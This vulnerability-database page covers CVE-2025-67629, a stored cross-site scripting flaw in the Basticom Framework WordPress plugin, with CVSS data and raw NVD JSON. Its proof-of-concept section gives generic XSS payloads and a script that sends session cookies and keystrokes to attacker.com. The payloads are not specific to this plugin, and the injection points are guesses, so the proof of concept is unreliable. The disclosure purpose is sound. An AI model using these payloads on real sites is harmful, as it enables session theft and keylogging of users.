Security Vulnerability Report
中文
CVE-2025-67629 CVSS 5.9 MEDIUM

CVE-2025-67629

Published: 2025-12-24 13:16:19
Last Modified: 2026-04-27 18:16:47

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basticom Basticom Framework basticom-framework allows Stored XSS.This issue affects Basticom Framework: from n/a through <= 1.5.2.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Basticom Framework <= 1.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for CVE-2025-67629 --> <!-- Basticom Framework Plugin <= 1.5.2 --> <!-- Method 1: Using script tag --> <script>alert(document.cookie)</script> <!-- Method 2: Using event handler --> <img src=x onerror=alert('XSS')> <!-- Method 3: Using SVG element --> <svg onload=alert(document.domain)> <!-- Method 4: Data URI-based XSS --> <a href="data:text/html,<script>alert(document.cookie)</script>">Click</a> <!-- Practical exploitation payload --> <script> // Steal session cookies fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)); // Or perform keylogging document.addEventListener('keypress', function(e) { fetch('https://attacker.com/log?key=' + e.key); }); </script> <!-- Injection points (depending on plugin functionality): --> <!-- - Plugin settings fields --> <!-- - Content display areas --> <!-- - Admin panel inputs -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67629", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:19.070", "lastModified": "2026-04-27T18:16:47.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basticom Basticom Framework basticom-framework allows Stored XSS.This issue affects Basticom Framework: from n/a through <= 1.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/basticom-framework/vulnerability/wordpress-basticom-framework-plugin-1-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}